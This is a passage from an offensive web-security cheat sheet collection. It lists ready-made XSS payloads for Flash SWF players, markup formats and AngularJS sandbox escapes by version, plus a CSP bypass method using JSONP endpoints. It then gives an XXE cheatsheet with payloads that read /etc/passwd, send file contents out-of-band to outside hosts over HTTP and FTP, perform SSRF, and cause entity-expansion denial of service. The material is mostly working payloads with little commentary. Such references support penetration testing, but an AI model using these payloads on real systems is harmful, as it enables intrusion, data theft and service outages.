134 | - FlashMediaElement: <code>flashmediaelement.swf?jsinitfunctio%gn=alert`1`</code>
135 | 
136 | - videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
137 | 
138 | - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
139 | 
140 | - YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
141 | 
142 | - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
143 | 
144 | - AutoDemo: `control.swf?onend=javascript:alert(1)//`
145 | 
146 | - Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
147 | 
148 | - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
149 | 
150 | - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
151 | 
152 | - SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
153 | 
154 | - Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
155 | 
156 | - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
157 | 
158 | _Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
159 | 
160 | **Lightweight Markup Languages**
161 | 
162 | **RubyDoc** (.rdoc)
163 | 
164 | ```rdoc
165 | XSS[JavaScript:alert(1)]
166 | ```
167 | 
168 | **Textile** ([.textile](https://txstyle.org/))
169 | 
170 | ```textile
171 | "Test link":javascript:alert(1)
172 | ```
173 | 
174 | **reStructuredText** ([.rst](http://docutils.sourceforge.net/docs/user/rst/quickref.html))
175 | 
176 | ```rst
177 | `Test link`__.
178 | 
179 | __ javascript:alert(document.domain)  
180 | ```
181 | 
182 | **Unicode characters**
183 | 
184 | ```html
185 | †‡•＜img src=a onerror=javascript:alert('test')>…‰€
186 | ```
187 | 
188 | **AngularJS Template Injection based XSS**
189 | 
190 | *For manual verification on a live target, use `angular.version` in your browser console*
191 | 
192 | **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
193 | 
194 | ```js
195 | {{constructor.constructor('alert(1)')()}}
196 | ```
197 | 
198 | **1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh)
199 | 
200 | ```js
201 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
202 | ```
203 | 
204 | **1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
205 | 
206 | ```js
207 | {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
208 | ```
209 | 
210 | **1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh)
211 | 
212 | ```js
213 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
214 | ```
215 | 
216 | **1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn)
217 | 
218 | ```js
219 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
220 | ```
221 | 
222 | **1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
223 | 
224 | ```js
225 | {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
226 | ```
227 | 
228 | **1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g)
229 | 
230 | ```
231 | {{!ready && (ready = true) && (
232 |       !call
233 |       ? $$watchers[0].get(toString.constructor.prototype)
234 |       : (a = apply) &&
235 |         (apply = constructor) &&
236 |         (valueOf = call) &&
237 |         (''+''.toString(
238 |           'F = Function.prototype;' +
239 |           'F.apply = F.a;' +
240 |           'delete F.a;' +
241 |           'delete F.valueOf;' +
242 |           'alert(1);'
243 |         ))
244 |     );}}
245 | ```
246 | 
247 | **1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
248 | 
249 | ```js
250 | {{
251 |     {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
252 |     'a'.constructor.prototype.charAt=''.valueOf; 
253 |     $eval('x=alert(1)//'); 
254 | }}
255 | ```
256 | 
257 | **1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
258 | 
259 | ```js
260 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 
261 | 
262 |   'a'.constructor.prototype.charAt=[].join;
263 |   $eval('x=alert(1)//');  }}
264 | ```
265 | 
266 | **1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
267 | 
268 | ```js
269 | {{
270 |     'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
271 |     $eval('x=alert(1)//'); 
272 | }}
273 | 
274 | ```
275 | 
276 | **1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
277 | 
278 | ```js
279 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
280 | ```
281 | 
282 | **1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
283 | 
284 | ```js
285 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
286 | ```
287 | 
288 | **1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024)
289 | 
290 | ```js
291 | {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
292 | ```
293 | 
294 | **1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh)
295 | 
296 | ```js
297 | {{
298 |     c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
299 |     c.$apply=$apply;c.$eval=b;op=$root.$$phase;
300 |     $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
301 |     C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
302 |     B=C(b,c,b);$evalAsync("
303 |     astNode=pop();astNode.type='UnaryExpression';
304 |     astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
305 |     astNode.argument={type:'Identifier',name:'foo'};
306 |     ");
307 |     m1=B($$asyncQueue.pop().expression,null,$root);
308 |     m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
309 |     $eval('a(b.c)');[].push.apply=a;
310 | }}
311 | ```
312 | 
313 | **1.6.0+** (no [Expression Sandbox](http://angularjs.blogspot.co.uk/2016/09/angular-16-expression-sandbox-removal.html)) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
314 | 
315 | ```js
316 | {{constructor.constructor('alert(1)')()}}
317 | ```
318 | 
319 | **Content Security Policy (CSP) bypass via JSONP endpoints**
320 | 
321 | Grab the target's CSP:
322 | 
323 | ```
324 | curl -I http://example.com | grep 'Content-Security-Policy'
325 | ```
326 | 
327 | Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.
328 | 
329 | ![image](https://user-images.githubusercontent.com/18099289/32136707-a1c12510-bc12-11e7-8a80-8a22b3e94232.png)
330 | 
331 | Now we can use a Google dork to find some JSONP endpoints on the domains listed above.
332 | 
333 | ```
334 | site:example.com inurl:callback
335 | ```
336 | 


--------------------------------------------------------------------------------
/cheatsheets/xxe.md:
--------------------------------------------------------------------------------
 1 | **LFI Test**
 2 | 
 3 | ```
 4 | <?xml version="1.0"?>
 5 | <!DOCTYPE foo [  
 6 | <!ELEMENT foo (#ANY)>
 7 | <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
 8 | ```
 9 | 
10 | **Blind LFI test (when first case doesn't return anything)**
11 | 
12 | ```
13 | <?xml version="1.0"?>
14 | <!DOCTYPE foo [
15 | <!ELEMENT foo (#ANY)>
16 | <!ENTITY % xxe SYSTEM "file:///etc/passwd">
17 | <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
18 | ```
19 | 
20 | **Access Control bypass (loading restricted resources - PHP example)**
21 | 
22 | ```
23 | <?xml version="1.0"?>
24 | <!DOCTYPE foo [
25 | <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
26 | <foo><result>&ac;</result></foo>
27 | ```
28 | 
29 | **SSRF Test**
30 | 
31 | ```
32 | <?xml version="1.0"?>
33 | <!DOCTYPE foo [  
34 | <!ELEMENT foo (#ANY)>
35 | <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
36 | ```
37 | 
38 | **XEE (XML Entity Expansion - DOS)**
39 | 
40 | ```
41 | <?xml version="1.0"?>
42 | <!DOCTYPE lolz [
43 | <!ENTITY lol "lol">
44 | <!ELEMENT lolz (#PCDATA)>
45 | <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
46 | <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
47 | <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
48 | <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
49 | <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
50 | <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
51 | <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
52 | <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
53 | <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
54 | ]>
55 | <lolz>&lol9;</lolz>
56 | ```
57 | 
58 | **XEE #2 (Remote attack - through external xml inclusion)**
59 | 
60 | ```
61 | <?xml version="1.0"?>
62 | <!DOCTYPE lolz [
63 | <!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
64 | <lolz><lol>3..2..1...&test<lol></lolz>
65 | ```
66 | 
67 | **XXE FTP HTTP Server**
68 | 
69 | https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
70 | 
71 | http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
72 | ```
73 | <!DOCTYPE data [
74 | <!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
75 | %remote;
76 | %send;
77 | ]>
78 | <data>4</data>
79 | 
80 | File stored on http://publicServer.com/parameterEntity_sendftp.dtd
81 | 
82 | <!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
83 | %param1;
84 | ```
85 | 
86 | **XXE UTF-7**
87 | 
88 | ```
89 | <?xml version="1.0" encoding="UTF-7"?>
90 | +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
91 | +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
92 | +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
93 | ```
94 | To convert between UTF-8 & UTF-7 use recode.
95 | `recode UTF8..UTF7 payload-file.xml`
96 | 


--------------------------------------------------------------------------------